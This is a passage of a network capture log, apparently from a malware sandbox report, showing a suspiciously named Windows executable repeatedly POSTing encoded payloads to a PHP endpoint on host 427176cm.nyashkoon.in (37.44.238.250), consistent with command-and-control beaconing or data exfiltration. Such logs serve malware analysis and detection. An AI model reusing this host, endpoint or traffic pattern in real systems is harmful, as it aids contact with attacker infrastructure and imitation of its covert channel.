                                        Nov 5, 2024 08:12:34.458817005 CET | 1032 | OUT | Data Raw: 5b 5f 46 59 5c 5a 5a 51 5e 5e 54 55 56 5f 5a 51 5f 52 59 50 52 5e 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_FY\ZZQ^^TUV_ZQ_RYPR^RYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'T ^'.2'14Z,+Y)#',?=>50<&^03$0=&G!']*3
                                        Nov 5, 2024 08:12:34.918490887 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:34.995388985 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        19 | 192.168.2.7 | 49856 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:35.117746115 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:35.474378109 CET | 1032 | OUT | Data Raw: 5b 55 43 5b 5c 58 5f 56 5e 5e 54 55 56 5c 5a 59 5f 57 59 5e 52 5d 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [UC[\X_V^^TUV\ZY_WY^R]RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-318Y$=10!+/(=C<^%/<(.2T$)&=3;<+*&G!']*?
                                        Nov 5, 2024 08:12:35.919531107 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:35.998197079 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:33 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        20 | 192.168.2.7 | 49862 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:36.117089987 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:36.474409103 CET | 1032 | OUT | Data Raw: 5e 59 43 5e 59 5c 5f 52 5e 5e 54 55 56 5e 5a 50 5f 57 59 51 52 50 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YC^Y\_R^^TUV^ZP_WYQRPRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-02%=]$!<Z/8<_='38>6053?_'(=&G!']*7


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        21 | 192.168.2.7 | 49864 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:36.685391903 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:37.036915064 CET | 1300 | OUT | Data Raw: 5b 5f 43 5c 59 5c 5a 5c 5e 5e 54 55 56 5c 5a 5a 5f 57 59 58 52 5f 52 5c 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_C\Y\Z\^^TUV\ZZ_WYXR_R\YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-3X'-\$ [,;#?%3</>=&$53-?%;#X>:&G!']*?
                                        Nov 5, 2024 08:12:37.508275986 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:37.590838909 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 5a 33 38 2b 08 23 14 25 08 2b 3e 3f 03 22 27 2f 5a 2c 3d 20 10 24 1d 09 0c 2a 3f 21 08 21 39 2a 58 35 03 0a 5e 23 10 02 0a 29 21 2f 5a 07 10 25 10 26 1c 23 52 32 3e 28 5f 24 30 3c 07 28 3c 3b 03 22 38 33 12 26 5d 35 58 24 3a 05 50 2f 2a 22 0e 2d 3b 23 5c 2f 32 20 58 26 34 2c 54 0d 10 3a 0b 3e 1f 3c 57 29 02 39 17 27 27 3c 1f 23 2e 24 07 3f 2a 05 08 3f 2e 26 5e 33 09 3c 57 22 0b 3d 54 26 28 24 11 30 31 3c 1a 32 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9Z38+#%+>?"'/Z,= $*?!!9*X5^#)!/Z%&#R2>(_$0<(<;"83&]5X$:P/*"-;#\/2 X&4,T:><W)9''<#.$?*?.&^3<W"=T&($01<2%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        22 | 192.168.2.7 | 49867 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:36.808707952 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:37.162015915 CET | 1032 | OUT | Data Raw: 5e 5e 46 5f 59 5d 5a 51 5e 5e 54 55 56 53 5a 5d 5f 5a 59 5f 52 50 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^F_Y]ZQ^^TUVSZ]_ZY_RPRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-',Z'-*'?;<^?%;'Z<>>'<\&=0'(>:&G!']*
                                        Nov 5, 2024 08:12:37.618966103 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:37.691761971 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        23 | 192.168.2.7 | 49875 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:37.827774048 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:38.177613020 CET | 1032 | OUT | Data Raw: 5e 58 43 59 59 5b 5a 56 5e 5e 54 55 56 5c 5a 5e 5f 54 59 51 52 51 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XCYY[ZV^^TUV\Z^_TYQRQR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$,0]$",(#>&<Y$#[*-6'/._&-73;$>:&G!']*?
                                        Nov 5, 2024 08:12:38.666007042 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:38.744168043 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:36 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        24 | 192.168.2.7 | 49881 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:38.875508070 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:39.224459887 CET | 1032 | OUT | Data Raw: 5b 58 43 58 5c 5e 5a 55 5e 5e 54 55 56 5f 5a 59 5f 57 59 5c 52 5b 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [XCX\^ZU^^TUV_ZY_WY\R[RYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.'2$^0>:'!7888^>73<*$,3=8'++X=:&G!']*3
                                        Nov 5, 2024 08:12:39.685066938 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:39.768563032 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:37 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        25 | 192.168.2.7 | 49888 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:39.907449961 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:40.256994009 CET | 1032 | OUT | Data Raw: 5e 5d 43 52 59 59 5a 5c 5e 5e 54 55 56 5e 5a 5c 5f 53 59 5a 52 5b 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CRYYZ\^^TUV^Z\_SYZR[RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$8%..32$_,(?>%8[3'Z>>>$&.#%(<*:&G!']*7
                                        Nov 5, 2024 08:12:40.717376947 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:40.788028002 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:38 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        26 | 192.168.2.7 | 49894 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:40.912460089 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:41.271466970 CET | 1028 | OUT | Data Raw: 5b 5a 43 5b 59 59 5f 55 5e 5e 54 55 56 5a 5a 5e 5f 53 59 5b 52 51 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZC[YY_U^^TUVZZ^_SY[RQR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G3#'=)_3$\//=%?%/8*5$:_$#\'<*:&G!']*
                                        Nov 5, 2024 08:12:41.732081890 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:41.812880039 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:39 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        27 | 192.168.2.7 | 49900 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:41.945900917 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:42.302489996 CET | 1032 | OUT | Data Raw: 5b 5a 43 52 5c 5f 5a 5c 5e 5e 54 55 56 52 5a 5d 5f 52 59 59 52 50 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [ZCR\_Z\^^TUVRZ]_RYYRPR[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$T<%-.0[-($^*(X0+^*-1'*]'7_$;?Y>&G!']*


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        28 | 192.168.2.7 | 49906 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:42.633456945 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:42.990045071 CET | 1300 | OUT | Data Raw: 5b 59 46 5f 59 5e 5a 5d 5e 5e 54 55 56 58 5a 50 5f 55 59 58 52 5f 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YF_Y^Z]^^TUVXZP_UYXR_R_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.C$'!3?,')C$_$[>)0?60+_3?X+*&G!']*/
                                        Nov 5, 2024 08:12:43.447751045 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:43.524463892 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 5f 27 16 05 0f 20 5c 2a 1d 2b 3d 33 05 22 27 3b 5a 2c 13 3b 05 24 33 06 11 29 2f 3e 52 37 5f 29 02 36 3d 27 00 23 3e 24 0d 2a 0b 2f 5a 07 10 26 01 32 32 33 1e 32 2e 30 12 30 23 0d 5b 3d 3c 12 5c 23 28 27 58 31 05 17 11 31 03 3b 57 2f 29 26 0b 2d 5e 30 05 39 57 30 5b 24 34 2c 54 0d 10 3a 0b 2a 1f 2b 0d 3e 12 25 17 25 09 1d 0d 23 3d 3f 13 3e 3a 27 0a 2b 5b 3e 5e 27 56 3b 0f 21 1c 29 53 25 28 38 11 33 0f 34 1b 25 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9_' \*+=3"';Z,;$3)/>R7_)6='#>$*/Z&2232.00#[=<\#('X11;W/)&-^09W0[$4,T:*+>%%#=?>:'+[>^'V;!)S%(834%"%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        29 | 192.168.2.7 | 49907 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:42.980545044 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:43.333689928 CET | 1032 | OUT | Data Raw: 5e 5d 43 59 5c 5f 5f 55 5e 5e 54 55 56 52 5a 5c 5f 50 59 5e 52 50 52 5f 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CY\__U^^TUVRZ\_PY^RPR_YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$",Z%.%X%"$;;?*6<X3<?[*0<&-'(]**&G!']*
                                        Nov 5, 2024 08:12:43.791974068 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:43.873958111 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:41 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        30 | 192.168.2.7 | 49913 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:43.991014004 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:44.349417925 CET | 1032 | OUT | Data Raw: 5b 5f 43 59 59 5b 5f 50 5e 5e 54 55 56 5c 5a 5e 5f 57 59 51 52 58 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [_CYY[_P^^TUV\Z^_WYQRXR]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.A%2,[0=3<Z/;>4$'Z*=.V31'?'8#X**&G!']*?
                                        Nov 5, 2024 08:12:44.804050922 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:44.881386042 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:42 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        31 | 192.168.2.7 | 49919 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:45.012877941 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:45.368901968 CET | 1032 | OUT | Data Raw: 5b 5b 46 5a 59 5c 5a 5d 5e 5e 54 55 56 58 5a 5e 5f 56 59 5a 52 5f 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [[FZY\Z]^^TUVXZ^_VYZR_RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-32$=$1</?)%('/)5'/-$=''+:&G!']*/
                                        Nov 5, 2024 08:12:45.824322939 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:45.895646095 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:43 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        32 | 192.168.2.7 | 49927 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:46.046489954 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
